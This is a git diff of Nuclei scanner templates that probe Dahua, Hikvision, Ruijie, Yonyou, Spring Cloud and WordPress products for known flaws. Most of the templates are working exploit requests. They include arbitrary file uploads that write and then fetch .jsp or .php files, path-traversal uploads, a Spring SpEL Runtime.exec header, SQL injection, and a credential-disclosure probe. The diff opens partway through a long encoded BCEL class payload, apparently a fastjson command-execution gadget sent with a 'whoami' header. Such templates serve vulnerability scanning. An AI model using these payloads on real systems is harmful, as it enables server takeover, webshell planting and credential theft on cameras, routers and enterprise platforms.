ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} + User-Agent: MicroMessenger + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj + + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj + Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + Content-Type: image/jpeg + + {{str3}} + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + + - | + GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: res_id + json: + - ".data.resourceUuid" + internal: true matchers: - - type: word - words: - - "nt authority\\system" + - type: dsl + dsl: + - body_2 == str2 diff --git a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..fa3aafbfe2 100644 --- a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml @@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.8997 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/Dahua_getUserInfoByUserName.yaml b/poc/other/Dahua_getUserInfoByUserName.yaml index 78d89c1465..77936cf562 100644 --- a/poc/other/Dahua_getUserInfoByUserName.yaml +++ b/poc/other/Dahua_getUserInfoByUserName.yaml @@ -1,29 +1,31 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" - - http: - method: GET path: - - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" matchers-condition: and matchers: - type: word part: body words: - - "c4ca" + - "loginName" + - "loginPass" - type: status status: - - 500 + - 200 + +# 获取后访问地址 +# /admin/login_login.action diff --git a/poc/other/Hikvision_Env_Information_Leakage.yaml b/poc/other/Hikvision_Env_Information_Leakage.yaml index e86e8491d1..cd961f6e81 100644 --- a/poc/other/Hikvision_Env_Information_Leakage.yaml +++ b/poc/other/Hikvision_Env_Information_Leakage.yaml @@ -1,40 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - raw: - - | - POST /svm/api/external/report HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> - - ------WebKitFormBoundary9PggsiM755PLa54a-- - - | - GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "data")' - - 'status_code_2 == 200' - - 'contains(body_2, "test")' - condition: and + - type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/other/Ruijie_EXCU_SHELL.yaml b/poc/other/Ruijie_EXCU_SHELL.yaml index f2db119795..fa762ac2f6 100644 --- a/poc/other/Ruijie_EXCU_SHELL.yaml +++ b/poc/other/Ruijie_EXCU_SHELL.yaml @@ -1,33 +1,37 @@ id: Ruijie info: - name: Ruijie Switch WEB Management System EXCU_ SHELL + name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Ruijie Switch WEB Management System EXCU_ SHELL + Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges metadata: - fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif" - hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif" + fofa-query: app="Ruijie-NBR路由器" + hunter-query: web.title="锐捷网络 --NBR路由器--登录界面" http: - raw: - | - GET /EXCU_SHELL HTTP/1.1 + POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Cmdnum: '1' - Command1: show running-config - Confirm1: n + Accept: text/plain, */*; q=0.01 + Content-Disposition: form-data; name="file"; filename="111.php" + Content-Type: image/jpeg + + - | + GET /321/test.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'contains(body_1, "configuration")' + - 'status_code_2 == 200' + - 'contains(body_1, "test.php")' + - 'contains(body_2, "PHP Version")' condition: and diff --git a/poc/other/devvn-image-hotspot.yaml b/poc/other/devvn-image-hotspot.yaml new file mode 100644 index 0000000000..dfafc5b351 --- /dev/null +++ b/poc/other/devvn-image-hotspot.yaml @@ -0,0 +1,59 @@ +id: devvn-image-hotspot + +info: + name: > + Image Hotspot by DevVN <= 1.2.5 - Authenticated (Author+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/624bdb9e-6c50-4a00-9a04-1a32c938d48b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/devvn-image-hotspot/" + google-query: inurl:"/wp-content/plugins/devvn-image-hotspot/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,devvn-image-hotspot,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/devvn-image-hotspot/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "devvn-image-hotspot" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.5') \ No newline at end of file diff --git a/poc/other/kbucket.yaml b/poc/other/kbucket.yaml new file mode 100644 index 0000000000..1b1acc9da2 --- /dev/null +++ b/poc/other/kbucket.yaml @@ -0,0 +1,59 @@ +id: kbucket + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b37087a4-83b2-4355-89f0-6ff0aa8d0013?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,kbucket,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.4') \ No newline at end of file diff --git a/poc/remote_code_execution/spring-functions-rce.yaml b/poc/remote_code_execution/spring-functions-rce.yaml index f08a8e8a9e..f28360d6a7 100644 --- a/poc/remote_code_execution/spring-functions-rce.yaml +++ b/poc/remote_code_execution/spring-functions-rce.yaml @@ -1,46 +1,44 @@ id: CVE-2022-22963 info: - name: Spring Cloud - Remote Code Execution - author: Mr-xn,Adam Crosser + name: CVE-2022-22963 - Spring Cloud RCE + author: rdnt severity: critical - description: | - Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. - reference: - - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE - - https://tanzu.vmware.com/security/cve-2022-22963 - - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ - - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection - - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 + description: RCE on Spring cloud function SPEL + tags: cve,rce,spring,cve2022,injection classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-94 - tags: vulhub,cve,cve2022,springcloud,rce,kev + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-770 requests: - - raw: - - | - POST /functionRouter HTTP/1.1 - Host: {{Hostname}} - spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") - Content-Type: application/x-www-form-urlencoded - - {{rand_base(8)}} + - method: POST + path: + - "{{RootURL}}/functionRouter" + - "{{RootURL}}/api/functionRouter" + - "{{RootURL}}/api/v1/functionRouter" + - "{{RootURL}}/../../../../../../functionRouter" + - "{{RootURL}}/../../../../../../;functionRouter" + - "{{RootURL}}/spring/functionRouter" + - "{{RootURL}}/admin/functionRouter" + - "{{RootURL}}/../../../../../../../../functionRouter" + - "{{RootURL}}../../../../../../../../api/functionRouter" + - "{{RootURL}}../../../../../../../../api/v1/functionRouter" + - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" + - "{{RootURL}}%2fspring%2ffunctionRouter" + - "{{RootURL}}%2fadmin%2functionRouter" + headers: + spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") + Content-Type: application/x-www-form-urlencoded + body: exp matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or - - - type: status - status: - - 500 - -# Enhanced by mp on 2022/05/19 + - type: word + part: body + words: + - 'functionRouter' + - type: status + status: + - 500 \ No newline at end of file diff --git a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml index cef49f23fa..653783158e 100644 --- a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml +++ b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml @@ -1,36 +1,43 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: yonyou-nc-cloud-jsinvoke-rce - author: pphua + name: Yonyou NC Cloud - Remote Code Execution + author: Co5mos severity: critical - tags: yonyou,nc-cloud,rce - reference: - - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA + description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. + reference: + - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" + tags: yonyou,rce + +variables: + str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} + - | - GET /{{randstr}}.txt HTTP/1.1 - Content-Length: 138 - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + GET /{{str1}} HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and matchers: - type: word + part: body words: - - "StringObject" - part: body \ No newline at end of file + - '5d8be7535d6383e99315739724e10fa7' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml index 538f6fd6d5..e86e8491d1 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml @@ -1,20 +1,19 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" - http: - raw: - | - POST /center/api/files;.html HTTP/1.1 + POST /svm/api/external/report HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a @@ -25,11 +24,17 @@ http: <%out.print("test");%> ------WebKitFormBoundary9PggsiM755PLa54a-- - + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'contains(body_1, "test.jsp")' + - 'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' condition: and diff --git a/poc/upload/Hikvision_iVMS-8700_upload.yaml b/poc/upload/Hikvision_iVMS-8700_upload.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload.yaml @@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d